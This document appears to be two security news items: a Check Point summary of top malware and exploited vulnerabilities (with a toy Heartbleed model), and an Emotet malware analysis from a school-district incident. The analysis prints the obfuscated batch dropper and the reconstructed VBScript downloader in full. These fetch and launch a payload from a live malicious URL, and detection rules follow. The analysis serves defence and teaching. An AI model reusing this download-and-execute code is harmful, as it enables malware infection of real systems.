
Check Point: Dridex Banking Trojan Ranks on Top Malware List for First Time - IT News Online

Posted: 14 Apr 2020 12:59 AM PDT

According to Check Point Research's Global Threat Index for March 2020, the well-known banking trojan Dridex, which first appeared in 2011, has entered the top ten malware list for the first time, as the third most prevalent malware in March. Dridex has been updated and is now being used in the early attack stages for downloading targeted ransomware, such as BitPaymer and DoppelPaymer.


The sharp increase in the use of Dridex was driven by several spam campaigns containing a malicious Excel file, which downloads the Dridex malware onto the victim's computer. This upsurge in Dridex highlights just how quickly cyber-criminals change the themes of their attacks to try to maximize infection rates. Dridex is a sophisticated strain of banking malware that targets the Windows platform. It is delivered by spam campaigns, infects computers and steals banking credentials and other personal information to facilitate fraudulent money transfers. The malware has been systematically updated and developed over the past decade.

XMRig remains in 1st place in the Index of top malware families, impacting 5 percent of organizations globally, followed by Jsecoin and Dridex which impacted 4 percent and 3 percent of organizations worldwide, respectively.

"Dridex appearing for the first time as one of the top malware families shows how quickly cybercriminals can change their methods," said Maya Horowitz, Director, Threat Intelligence and Research, Products, Check Point. "This kind of malware can be very lucrative for criminals given its sophistication, and is now being used as a ransomware downloader, which makes it even more dangerous than previous variants. So, individuals need to be wary of emails with attachments, even if they appear to originate from a trusted source, especially with the explosion in home working over the past few weeks. Organizations need to be educating employees on how to identify malicious spam, and deploy security measures that help protect their teams and networks against such threats."

The research team also warns that "MVPower DVR Remote Code Execution" remained the most common exploited vulnerability, impacting 30 percent of organizations globally, closely followed by "PHP php-cgi Query String Parameter Code Execution" with a global impact of 29 percent, followed by "OpenSSL TLS DTLS Heartbeat Information Disclosure" impacting 27 percent of organizations worldwide.

Top malware families

XMRig: XMRig is open-source CPU mining software used to mine the Monero cryptocurrency, first seen in the wild in May 2017.

Jsecoin: Jsecoin is a web-based cryptominer, designed to perform online mining of Monero cryptocurrency when a user visits a particular web page. The implanted JavaScript uses a large amount of the end user's computational resources to mine coins, thus impacting the system performance.

Dridex: Dridex is a banking Trojan that targets the Windows platform and is delivered by spam campaigns and exploit kits. It uses WebInjects to intercept and redirect banking credentials to an attacker-controlled server. Dridex contacts a remote server, sends information about the infected system and can also download and execute additional modules for remote control.

Trickbot: Trickbot is a dominant banking Trojan constantly being updated with new capabilities, features and distribution vectors. This enables Trickbot to be a flexible and customizable malware that can be distributed as part of multi-purposed campaigns.

Emotet: Emotet is an advanced, self-propagating and modular Trojan. Emotet was once employed as a banking Trojan and is now used as a distributor of other malware and malicious campaigns. It uses multiple methods for maintaining persistence and evasion techniques to avoid detection. It is typically spread through phishing spam emails carrying malicious attachments or links.

Agent Tesla: Agent Tesla is an advanced RAT, functioning as a keylogger and a password stealer. Agent Tesla is capable of monitoring and collecting the victim's keyboard input, system clipboard, taking screenshots and exfiltrating credentials from a variety of software installed on a victim's machine (including Google Chrome, Mozilla Firefox and Microsoft Outlook email client).

Formbook: Formbook is an Info Stealer that harvests credentials from various web browsers, collects screenshots, monitors and logs keystrokes, and can download and execute files according to its C&C orders.

Lokibot: Lokibot is an info stealer distributed mainly by phishing emails and is used to steal various data such as email credentials, as well as passwords to cryptocurrency wallets and FTP servers.

Ramnit: Ramnit is a banking Trojan that steals banking credentials, FTP passwords, session cookies and personal data.

RigEK: RigEK delivers exploits for Flash, Java, Silverlight and Internet Explorer. The infection chain starts with a redirection to a landing page that contains JavaScript that checks for vulnerable plug-ins and delivers the exploit.

Top exploited vulnerabilities

MVPower DVR Remote Code Execution: A remote code execution vulnerability that exists in MVPower DVR devices. A remote attacker can exploit this weakness to execute arbitrary code on the affected device via a crafted request.

PHP php-cgi Query String Parameter Code Execution: A remote code execution vulnerability that has been reported in PHP. The vulnerability is due to the improper parsing and filtering of query strings by PHP. A remote attacker may exploit this issue by sending crafted HTTP requests. Successful exploitation allows an attacker to execute arbitrary code on the target.

OpenSSL TLS DTLS Heartbeat Information Disclosure (CVE-2014-0160; CVE-2014-0346): An information disclosure vulnerability which exists in OpenSSL. The vulnerability is due to an error when handling TLS/DTLS heartbeat packets. An attacker can leverage this vulnerability to disclose memory contents of a connected client or server.

Web Server Exposed Git Repository Information Disclosure: An information disclosure vulnerability that arises when a web server exposes a Git repository (its .git directory) to remote clients. Successful exploitation of this vulnerability could allow unintentional disclosure of account information.

Dasan GPON Router Authentication Bypass (CVE-2018-10561): An authentication bypass vulnerability exists in Dasan GPON routers. Successful exploitation of this vulnerability would allow remote attackers to obtain sensitive information and gain unauthorized access into the affected system.

Huawei HG532 Router Remote Code Execution: A remote code execution vulnerability exists in Huawei HG532 Routers. A remote attacker can exploit this weakness to execute arbitrary code in the affected router via a crafted request.

D-Link DSL-2750B Remote Command Execution: A remote command execution vulnerability exists in D-Link DSL-2750B routers. A remote attacker can exploit this weakness to execute arbitrary commands on the affected device via a crafted request.

PHP DIESCAN Information Disclosure: An information disclosure vulnerability that has been reported in the PHP pages. Successful exploitation could lead to the disclosure of sensitive information from the server.

SQL Injection (several techniques): Insertion of SQL statements into input sent from the client to the application, exploiting a vulnerability in the way the application's software constructs its database queries.

OpenSSL Padding Oracle Information Disclosure: An information disclosure vulnerability exists in the AES-NI implementation of OpenSSL. The vulnerability is due to memory allocation miscalculation during a certain padding check. A remote attacker can exploit this vulnerability to obtain sensitive clear text information via a padding-oracle attack against an AES CBC session.
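The heartbeat entry above only says that the bug was "an error when handling TLS/DTLS heartbeat packets". The following Python model is an added example, not part of the Check Point report, showing what that error was: a heartbeat record carries a sender-supplied payload length, the pre-fix handler trusted that length and copied that many bytes into its reply, and the fixed handler rejects any claim that does not fit inside the record it actually received. Process memory is simulated by a byte string (the record followed by whatever sits after it), and the neighbouring "secret" is constructed for the demonstration.

```python
# Added example: a toy model of the OpenSSL heartbeat bug (CVE-2014-0160).
# Heartbeat message layout (RFC 6520):
#   type (1 byte) | payload_length (2 bytes, big-endian) | payload | padding (>= 16 bytes)
# Process memory is simulated as one bytes object: the received record
# followed by whatever happened to sit after it on the heap.
import struct
from typing import Optional

HEARTBEAT_REQUEST = 1
HEARTBEAT_RESPONSE = 2
MIN_PADDING = 16


def build_heartbeat(payload: bytes, claimed_length: Optional[int] = None) -> bytes:
    """Encode a heartbeat request; claimed_length lets the sender lie about the size."""
    length = len(payload) if claimed_length is None else claimed_length
    return struct.pack("!BH", HEARTBEAT_REQUEST, length) + payload + b"\x00" * MIN_PADDING


def _reply(payload: bytes) -> bytes:
    return struct.pack("!BH", HEARTBEAT_RESPONSE, len(payload)) + payload + b"\x00" * MIN_PADDING


def vulnerable_process(memory: bytes, record_length: int) -> bytes:
    """Pre-1.0.1g logic: trust payload_length; record_length is received but never consulted."""
    hbtype, payload_length = struct.unpack("!BH", memory[:3])
    if hbtype != HEARTBEAT_REQUEST:
        raise ValueError("not a heartbeat request")
    payload = memory[3:3 + payload_length]  # reads past the record when the length is a lie
    return _reply(payload)


def fixed_process(memory: bytes, record_length: int) -> Optional[bytes]:
    """1.0.1g logic: silently discard the message if the claimed payload cannot fit the record."""
    if record_length < 1 + 2 + MIN_PADDING:
        return None
    hbtype, payload_length = struct.unpack("!BH", memory[:3])
    if hbtype != HEARTBEAT_REQUEST:
        raise ValueError("not a heartbeat request")
    if 1 + 2 + payload_length + MIN_PADDING > record_length:
        return None
    return _reply(memory[3:3 + payload_length])


# Constructed data. The real attack could claim up to 64 KiB (16-bit length);
# here the lie is just large enough to cover the neighbouring secret.
SECRET = b"session=9f1c2b7e; Authorization: Basic dXNlcjpodW50ZXIy"  # constructed, not real
HONEST = build_heartbeat(b"ping")
LYING = build_heartbeat(b"ping", claimed_length=len(b"ping") + MIN_PADDING + len(SECRET))


def demo() -> dict:
    """Run both handlers against the same simulated memory and report what happens."""
    memory = LYING + SECRET
    leaked = vulnerable_process(memory, len(LYING))
    return {
        "vulnerable_leaks_secret": SECRET in leaked,
        "fixed_rejects_lie": fixed_process(memory, len(LYING)) is None,
        "fixed_answers_honest": fixed_process(HONEST + SECRET, len(HONEST)) is not None,
    }


if __name__ == "__main__":
    print(demo())
```

The check that matters is the single comparison in fixed_process: every length field in a protocol message is attacker data until it has been compared against the number of bytes actually received.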

Top malware families - Mobile

This month xHelper retained the 1st place in the most prevalent mobile malware, followed by AndroidBauts and Lotoor.

xHelper: A malicious application seen in the wild since March 2019, used to download other malicious apps and display advertisements. The application can hide itself from the user and reinstall itself if it is uninstalled.

AndroidBauts: Adware targeting Android users that exfiltrates IMEI, IMSI, GPS location and other device information and allows the installation of third-party apps and shortcuts on mobile devices.

Lotoor: A hacking tool that exploits vulnerabilities on Android operating systems to gain root privileges on compromised mobile devices.

Emotet + Trickbot (unsuccessfully) attack Washington school district. - Elemental

Posted: 13 Apr 2020 05:10 PM PDT

Mason Moran

As COVID-19 keeps most people from going to work, there are a few essential jobs that must adapt and overcome these trying times. I'm speaking specifically about education. School districts are currently being swamped with requests to immediately transition all their traditional brick-and-mortar classes into virtual learning spaces so the business of educating America's youth can continue unabated.

This massive undertaking comes at a time when schools are more underfunded and understaffed than ever. My team and I decided to reach out to a few school districts and see if they needed assistance of any kind with cyber security, threat hunting, IT infrastructure, etc. As it turned out, they did need assistance: they needed guidance on whether or not Zoom was safe for students to use, and they offhandedly mentioned that they may have suffered an attack recently. Fortunately, the attack was never completed; Microsoft ATP shut down the process and the IT staff disconnected the host from the network.

This school district, while very prominent, does not have the funding for malware analysis personnel or a malware lab. My team was more than happy to help, so we decided to conduct some pro bono malware analysis and threat hunting on the bad actor that attempted to attack this school district. The IT staff sent us an ATP information summary which listed the malicious domain, process trees, hashes, registry keys, and executables.

WHAT IS EMOTET?

Emotet was developed as a banking Trojan and is traditionally spread through malicious emails. Within those emails Emotet can be delivered in several ways, including malicious links, macro-enabled documents, or malicious scripts. In this instance a user downloaded a ZIP7 file and opened a .doc file whose macro then ran. Emotet mimics worm-like functionality in order to spread throughout a network, furthering the distribution of malware. It was this functionality that prompted the Department of Homeland Security to state that Emotet is one of the most costly and destructive malware strains, costing up to $1,000,000 per incident to remediate. Early Emotet iterations arrived as JavaScript files; the more sophisticated macro-enabled versions reach out to a command and control (C2) domain to pull down the payloads used to conduct an attack. It is important to note that Emotet checks whether it is being run inside a virtual machine, and remains dormant if it detects that it is in a sandbox.

What we discovered was that the school district had been subjected to an Emotet and possible ransomware attack, luckily an unsuccessful one.

The URL listed, www(.)agualuz(.)it/carasi/ubiitacarasea(.)php, is to this day still up and serving malware. Unfortunately, when my team went to the site to pull down our own samples, the hashes did not match those of the samples the school district had. It is typical of Emotet to change continuously in order to avoid detection. According to Malwarebytes, Emotet receives updates from its command and control server, much as an operating system pulls down updates for your home devices.

Without further ado, here is what our team found:

FILE ANALYSIS

Name: oletools-decrypt-OhBRGb.doc
Type: Office Open XML document with macros (.docm)
Size: 457,089 bytes
MD5: 9263304fde358cc34bb97ae4d4dcadf6
SHA1: 6b24fa52dd92c600db597337f403c0e6901d1e38
SHA256: 690199bbf13fb6e96c9b1be4d5c329f1ae50e135839fe09d2aea72b44617048e
ssdeep: 12288:38JbH1a/TDM00ODbVY1G610palxc9svznQQ:34Ja/k006bVYI2x2sbQQ

Analyst Notes:

Opening the document, we are presented with the typical "click 'Enable Content' in order to view this document" lure, intended to trick users into allowing the document's malicious macros to execute.

Following the author's helpful suggestion doesn't produce the promised outcome (what a surprise). However, if we hop over to Process Monitor and look at the process tree for our Word process, we'll see some interesting activity:

Here we see Word executing a batch script file named "errorfix.bat" from a directory that previously didn't exist ("C:\DiskDrive\1\Volume\"). Visiting this new location, we find that the file is still there and contains the following:

errorfix.bat

set HyperX=C:\DiskDrive\1\Volume\BackFiles\pinumber.vbs
9348363686198739179751587226
9474742648528537769321458672
8412946179143649749358227398
echo Dim mySettings1, mySettings2, mySettings3, mySettings4, mySettings5, concept, Gear >> %HyperX%
echo On Error Resume Next >> %HyperX%
echo. >> %HyperX%
echo Set mySettings1 = Wscript.Arguments >> %HyperX%
echo Set mySettings2 = CreateObject("WinHttp.WinHttpRequest.5.1") >> %HyperX%
echo mySettings5 = mySettings1(0) >> %HyperX%
1368191838659622734354772892632419339
4358382767674781577257643818564872861
6644724718343573948724399898439484415
5495565692312222165371948243751121221
2985389129318138571829993894592289251
echo concept = mySettings1(1) >> %HyperX%
echo. >> %HyperX%
echo mySettings2.Open "GET", mySettings5, False >> %HyperX%
echo mySettings2.Send >> %HyperX%
echo Gear = mySettings2.Status >> %HyperX%
echo. >> %HyperX%
echo If Gear ^<^> 200 Then >> %HyperX%
echo WScript.Quit 1 >> %HyperX%
echo End If >> %HyperX%
echo. >> %HyperX%
echo Set mySettings4 = CreateObject("ADODB.Stream") >> %HyperX%
76826228779665155383762694561869834537778
59778282238469373774545735712189785747298
42752626353561456456952977647769564234586
41416423115176912399449464673328827377365
echo mySettings4.Open >> %HyperX%
echo mySettings4.Type = 1 >> %HyperX%
echo mySettings4.Write mySettings2.ResponseBody >> %HyperX%
echo mySettings4.Position = 0 >> %HyperX%
echo. >> %HyperX%
echo Set mySettings3 = CreateObject("Scripting.FileSystemObject") >> %HyperX%
66924269127968475
61661866173271951
34845411555886914
78783942258211475
43317726392434975
84774169224839635
35217925795327483
57761797252482465
63126124233291271
61945694767658536
92555235759141739
echo If mySettings3.FileExists(concept) Then mySettings3.DeleteFile concept >> %HyperX%
echo mySettings4.SaveToFile concept >> %HyperX%
echo mySettings4.Close >> %HyperX%
67211168772487297341581816112538782731917
88668316912451491877764622866549215835537
56952965353626615349315163857523565315944
77813479238582998597633752529469167496146
27126985826419241191925967997145781913182
cscript //nologo C:\DiskDrive\1\Volume\BackFiles\pinumber.vbs http://agualuz.it/carasi/ubiitacarasea.php C:\DiskDrive\1\Volume\BackFiles\Heriopa.exe
8582345713269493816473851488
8984972686169863749273681218
5547934191651715962991639596
9833698695753915728639531826
9268881419882989999583336871
break>C:\DiskDrive\1\Volume\BackFiles\pinumber.vbs
6687295446763635799336821764
6184512158443885714753439345
9482186474349379752922578492
6725684161211681964934572924
powers^
hell -C Sleep -s 4;Saps 'C:\DiskDrive\1\Volume\BackFiles\Heriopa.exe'
65438893731981658182923637951611528213147
77373845766741617451934377397795365385633
44931356696737354815758129841651963146884
97759735255533916424192157142563198882455

After cleaning the script up (stripping the junk numeric lines, joining the caret-continued "powers^" / "hell" line back into "powershell", and expanding the Saps alias to Start-Process), this is what we're left with:

errorfix.bat (Clean)

set HyperX=C:\DiskDrive\1\Volume\BackFiles\pinumber.vbs
echo Dim mySettings1, mySettings2, mySettings3, mySettings4, mySettings5, concept, Gear >> %HyperX%
echo On Error Resume Next >> %HyperX%
echo. >> %HyperX%
echo Set mySettings1 = Wscript.Arguments >> %HyperX%
echo Set mySettings2 = CreateObject("WinHttp.WinHttpRequest.5.1") >> %HyperX%
echo mySettings5 = mySettings1(0) >> %HyperX%
echo concept = mySettings1(1) >> %HyperX%
echo. >> %HyperX%
echo mySettings2.Open "GET", mySettings5, False >> %HyperX%
echo mySettings2.Send >> %HyperX%
echo Gear = mySettings2.Status >> %HyperX%
echo. >> %HyperX%
echo If Gear ^<^> 200 Then >> %HyperX%
echo WScript.Quit 1 >> %HyperX%
echo End If >> %HyperX%
echo. >> %HyperX%
echo Set mySettings4 = CreateObject("ADODB.Stream") >> %HyperX%
echo mySettings4.Open >> %HyperX%
echo mySettings4.Type = 1 >> %HyperX%
echo mySettings4.Write mySettings2.ResponseBody >> %HyperX%
echo mySettings4.Position = 0 >> %HyperX%
echo. >> %HyperX%
echo Set mySettings3 = CreateObject("Scripting.FileSystemObject") >> %HyperX%
echo If mySettings3.FileExists(concept) Then mySettings3.DeleteFile concept >> %HyperX%
echo mySettings4.SaveToFile concept >> %HyperX%
echo mySettings4.Close >> %HyperX%
cscript //nologo C:\DiskDrive\1\Volume\BackFiles\pinumber.vbs http://agualuz.it/carasi/ubiitacarasea.php C:\DiskDrive\1\Volume\BackFiles\Heriopa.exe
break>C:\DiskDrive\1\Volume\BackFiles\pinumber.vbs
powershell -C Sleep -s 4;Start-Process 'C:\DiskDrive\1\Volume\BackFiles\Heriopa.exe'

Here we see that errorfix.bat builds a VBScript file by echoing code into the file "C:\DiskDrive\1\Volume\BackFiles\pinumber.vbs". pinumber.vbs is then executed via cscript, and passed two arguments:

hxxp://agualuz.it/carasi/ubiitacarasea.php

C:\DiskDrive\1\Volume\BackFiles\Heriopa.exe

We see that after executing pinumber.vbs, errorfix.bat empties the file with the line "break>C:\DiskDrive\1\Volume\BackFiles\pinumber.vbs" (break is a do-nothing internal cmd command, so the redirect simply truncates the file to zero bytes). Putting the file back together is no trouble though:

pinumber.vbs

Dim mySettings1, mySettings2, mySettings3, mySettings4, mySettings5, concept, Gear
On Error Resume Next

' Arguments: (0) download URL, (1) destination path
Set mySettings1 = Wscript.Arguments
Set mySettings2 = CreateObject("WinHttp.WinHttpRequest.5.1")
mySettings5 = mySettings1(0)
concept = mySettings1(1)

' Fetch the payload; bail out quietly on anything other than HTTP 200
mySettings2.Open "GET", mySettings5, False
mySettings2.Send
Gear = mySettings2.Status
If Gear <> 200 Then
    WScript.Quit 1
End If

' Write the binary response body (Type = 1 is adTypeBinary) to disk, replacing any existing file
Set mySettings4 = CreateObject("ADODB.Stream")
mySettings4.Open
mySettings4.Type = 1
mySettings4.Write mySettings2.ResponseBody
mySettings4.Position = 0
Set mySettings3 = CreateObject("Scripting.FileSystemObject")
If mySettings3.FileExists(concept) Then mySettings3.DeleteFile concept
mySettings4.SaveToFile concept
mySettings4.Close

As you've probably already guessed, this script downloads a file from the URL supplied as the first argument (hxxp://agualuz.it/carasi/ubiitacarasea.php) and saves it to the path provided in the second argument (C:\DiskDrive\1\Volume\BackFiles\Heriopa.exe). And if we go back to errorfix.bat, we'll see that its final act is to have PowerShell execute the downloaded file after a four-second sleep.
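The manual clean-up performed above (drop the all-digit filler lines, rejoin the caret-continued "powers^" / "hell" line, and collect the echo >> lines into the file they build) is mechanical enough to script. The following Python is an added example, not the authors' tooling, that rebuilds pinumber.vbs and the follow-on commands from an abridged excerpt of the errorfix.bat shown above; the excerpt is embedded as constructed input, and the helper names and the shape of the returned dictionary are my own choices. It also unescapes the "^<^>" carets, expands %HyperX% to the real path, records which file the break> redirect truncates, and pulls any URL out of the remaining commands as an indicator.

```python
# Added example (not the authors' tooling): rebuild the file that an
# echo-builder batch script writes, handling the tricks seen in errorfix.bat:
# junk all-digit lines, "^" end-of-line continuation (powers^ / hell),
# "echo." blank lines, "^<^>" escapes, and %VAR% expansion of the target path.
import re

# Abridged excerpt of the errorfix.bat shown above, embedded as constructed input.
SAMPLE_BAT = r"""
set HyperX=C:\DiskDrive\1\Volume\BackFiles\pinumber.vbs
9348363686198739179751587226
echo Dim mySettings1, mySettings2, mySettings3, mySettings4, mySettings5, concept, Gear >> %HyperX%
echo On Error Resume Next >> %HyperX%
echo. >> %HyperX%
echo Set mySettings1 = Wscript.Arguments >> %HyperX%
echo Set mySettings2 = CreateObject("WinHttp.WinHttpRequest.5.1") >> %HyperX%
echo mySettings5 = mySettings1(0) >> %HyperX%
1368191838659622734354772892632419339
echo concept = mySettings1(1) >> %HyperX%
echo mySettings2.Open "GET", mySettings5, False >> %HyperX%
echo mySettings2.Send >> %HyperX%
echo Gear = mySettings2.Status >> %HyperX%
echo If Gear ^<^> 200 Then >> %HyperX%
echo WScript.Quit 1 >> %HyperX%
echo End If >> %HyperX%
echo Set mySettings4 = CreateObject("ADODB.Stream") >> %HyperX%
echo mySettings4.Write mySettings2.ResponseBody >> %HyperX%
echo mySettings4.SaveToFile concept >> %HyperX%
cscript //nologo C:\DiskDrive\1\Volume\BackFiles\pinumber.vbs http://agualuz.it/carasi/ubiitacarasea.php C:\DiskDrive\1\Volume\BackFiles\Heriopa.exe
8582345713269493816473851488
break>C:\DiskDrive\1\Volume\BackFiles\pinumber.vbs
powers^
hell -C Sleep -s 4;Saps 'C:\DiskDrive\1\Volume\BackFiles\Heriopa.exe'
"""

VAR_RE = re.compile(r"%(\w+)%")
URL_RE = re.compile(r"https?://[^\s'\"]+")


def _expand(text, env):
    """Expand %NAME% using the variables the script itself set."""
    return VAR_RE.sub(lambda m: env.get(m.group(1), m.group(0)), text)


def _join_continuations(lines):
    """cmd.exe treats a trailing ^ as 'continue this command on the next line'."""
    out, pending = [], None
    for line in lines:
        if pending is not None:
            line, pending = pending + line, None
        if line.endswith("^"):
            pending = line[:-1]
            continue
        out.append(line)
    if pending is not None:
        out.append(pending)
    return out


def deobfuscate_batch(text):
    """Return the files the script builds, the commands it runs, truncated paths and URLs."""
    env, files, commands, truncated = {}, {}, [], []
    for line in _join_continuations(text.splitlines()):
        line = line.strip()
        if not line or line.isdigit():           # junk filler lines
            continue
        low = line.lower()
        if low.startswith("set ") and "=" in line:
            name, value = line[4:].split("=", 1)
            env[name.strip()] = value.strip()
        elif low.startswith("echo") and ">>" in line:
            body, target = line.rsplit(">>", 1)   # the last >> is the redirect
            body = body[4:]
            if body.startswith("."):              # "echo." prints an empty line
                body = body[1:]
            body = re.sub(r"\^(.)", r"\1", body.strip())   # drop cmd's ^ escapes
            files.setdefault(_expand(target.strip(), env), []).append(body)
        elif low.startswith("break>"):            # break is a no-op: this truncates the file
            truncated.append(_expand(line[6:].strip(), env))
        else:
            commands.append(_expand(line, env))
    urls = sorted({u for c in commands for u in URL_RE.findall(c)})
    return {"files": {p: "\n".join(b) for p, b in files.items()},
            "commands": commands, "truncated": truncated, "urls": urls}


if __name__ == "__main__":
    result = deobfuscate_batch(SAMPLE_BAT)
    for path, content in result["files"].items():
        print(f"--- {path} ---\n{content}")
    print("commands:", *result["commands"], sep="\n  ")
    print("urls:", result["urls"])
```

Because the script reads the variables the batch file sets rather than hard-coding the path, the same routine works when the next sample renames HyperX or moves the drop directory; what it does not do is evaluate cmd's delayed expansion or string slicing, so a sample that builds its path piecewise will still need a look by hand.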

Indicators of Compromise

• Created directories:

◦ C:\DiskDrive\

◦ C:\DiskDrive\1\

◦ C:\DiskDrive\1\Volume\

◦ C:\DiskDrive\1\Volume\BackFiles\

• Created files:

◦ C:\DiskDrive\1\Volume\errorfix.bat

▪ Size: 2,877 bytes

▪ MD5: 4e066023c2dc2088807e8c7afad150ca

▪ SHA1: 4b1e4a4ff73eafca79c57d44a612f18fc0fc78a2

▪ SHA256: 8a8068c62687d79917042819e6984a93efcddf939060376b2f09ee88d589a39f

◦ C:\DiskDrive\1\Volume\BackFiles\pinumber.vbs

▪ Size: 739 bytes

▪ MD5: a686b686c064a497e4a55e477ce4eacf

▪ SHA1: 181227fa3c106895cb925fb42685c5ad00ee5e03

▪ SHA256: c412d610965b38a940debd016a07a5b97d01d80d266a8d1796a3a3dae8241a04

◦ C:\DiskDrive\1\Volume\BackFiles\Heriopa.exe

• Domains:

◦ agualuz.it

• URLs:

◦ hxxp://agualuz.it/carasi/ubiitacarasea.php
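The indicators above are what a defender feeds into endpoint telemetry. The following Python is an added example, not part of the post or of the ATP output the authors received, that applies a handful of process-creation rules the chain in this post would trip (an Office application spawning a shell or script host, a script host handed a URL, PowerShell using Start-Process or its Saps alias on an executable outside trusted directories, and anything touching C:\DiskDrive\ or agualuz.it) to constructed Sysmon-style event records. The event fields, timestamps and the two benign examples are made up for the demonstration; only the paths, URL and command lines reuse what the analysis found.

```python
# Added example: hunt for the Word -> errorfix.bat -> pinumber.vbs -> Heriopa.exe
# chain in process-creation telemetry. Events are Sysmon-style dicts constructed
# for this example; the IoC directory and domain come from the post's IoC list.
import re
from urllib.parse import urlparse

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"cscript.exe", "wscript.exe", "mshta.exe"}
SHELLS = {"cmd.exe", "powershell.exe"} | SCRIPT_HOSTS
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
IOC_PATH_PREFIXES = ("c:\\diskdrive\\",)   # from the IoC list above
IOC_DOMAINS = {"agualuz.it"}                 # from the IoC list above
URL_RE = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)
EXE_RE = re.compile(r"[a-z]:\\[^'\"]*?\.exe")

# Constructed Sysmon EID 1-style records (assumed field names: ts, image, parent_image, command_line).
SAMPLE_EVENTS = [
    {"ts": "2020-04-07T09:12:01", "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" /n "C:\Users\staff\Desktop\oletools-decrypt-OhBRGb.doc"'},
    {"ts": "2020-04-07T09:12:19", "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "command_line": r"cmd /c C:\DiskDrive\1\Volume\errorfix.bat"},
    {"ts": "2020-04-07T09:12:20", "image": r"C:\Windows\System32\cscript.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"cscript //nologo C:\DiskDrive\1\Volume\BackFiles\pinumber.vbs http://agualuz.it/carasi/ubiitacarasea.php C:\DiskDrive\1\Volume\BackFiles\Heriopa.exe"},
    {"ts": "2020-04-07T09:12:21", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"powershell -C Sleep -s 4;Saps 'C:\DiskDrive\1\Volume\BackFiles\Heriopa.exe'"},
    {"ts": "2020-04-07T09:30:00", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe", "command_line": "powershell -Command Get-Process"},
    {"ts": "2020-04-07T09:31:00", "image": r"C:\Windows\System32\cscript.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe", "command_line": r"cscript C:\Windows\System32\slmgr.vbs /dlv"},
]


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: dict) -> list:
    """Return the names of every rule the event matches (empty list means no finding)."""
    hits = []
    image, parent = _basename(ev["image"]), _basename(ev["parent_image"])
    cmd = ev["command_line"]
    low = cmd.lower()
    if parent in OFFICE_APPS and image in SHELLS:
        hits.append("office_spawns_shell")
    urls = URL_RE.findall(cmd)
    if image in SCRIPT_HOSTS and urls:
        hits.append("script_host_with_url")
    if any((urlparse(u).hostname or "") in IOC_DOMAINS for u in urls):
        hits.append("ioc_domain")
    if image == "powershell.exe" and re.search(r"\b(start-process|saps)\b", low):
        if any(not exe.startswith(TRUSTED_DIRS) for exe in EXE_RE.findall(low)):
            hits.append("powershell_launch_untrusted_exe")
    if any(prefix in low for prefix in IOC_PATH_PREFIXES):
        hits.append("ioc_path")
    return hits


def hunt(events: list) -> list:
    """Keep only events with at least one finding, in arrival order."""
    alerts = []
    for ev in events:
        rules = score_event(ev)
        if rules:
            alerts.append({"ts": ev["ts"], "image": _basename(ev["image"]), "rules": rules})
    return alerts


if __name__ == "__main__":
    for alert in hunt(SAMPLE_EVENTS):
        print(alert["ts"], alert["image"], ", ".join(alert["rules"]))
```

The first three rules are behavioural and keep firing after the actor rotates the drop directory, file names and domain; the two IoC rules are cheap confirmation for this specific campaign and should be expected to go stale, as the authors' own observation that the served sample's hashes had already changed suggests.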

Written by Mason Moran and Joe Lustri.

About the Authors:

Mason Moran is a cyber security professional currently working for the government. He has roughly eight years of experience working with the government, specializing in operations, vulnerability assessment, incident response, SIEM, security engineering, and threat hunting. Mason also has experience in other fields such as threat intelligence, malware analysis, and social engineering. Mason holds many certifications, including Security+, SSCP, CEH, Splunk Power User, ACAS Scan, and others. Recently, he and fellow colleagues formed a cyber security group that is volunteering their skills and time during the COVID-19 pandemic to help others in need, such as school districts and small businesses.

Joe Lustri is a malware analyst and aspiring software engineer who currently works for the government, with roughly six years of experience in this capacity. Joe wears multiple hats, as he is also the team lead for a digital forensics and malware analysis shop that works for the government. Joe showed early in his career that he had a knack for solving problems, developing five separate toolsets for the government to automate work and rid processes of human error. He currently holds the GIAC Certified Forensic Examiner, GIAC Reverse Engineering Malware, and Cellebrite Advanced Smartphone Analysis certifications. Joe is currently the lead software engineer for the previously mentioned group.
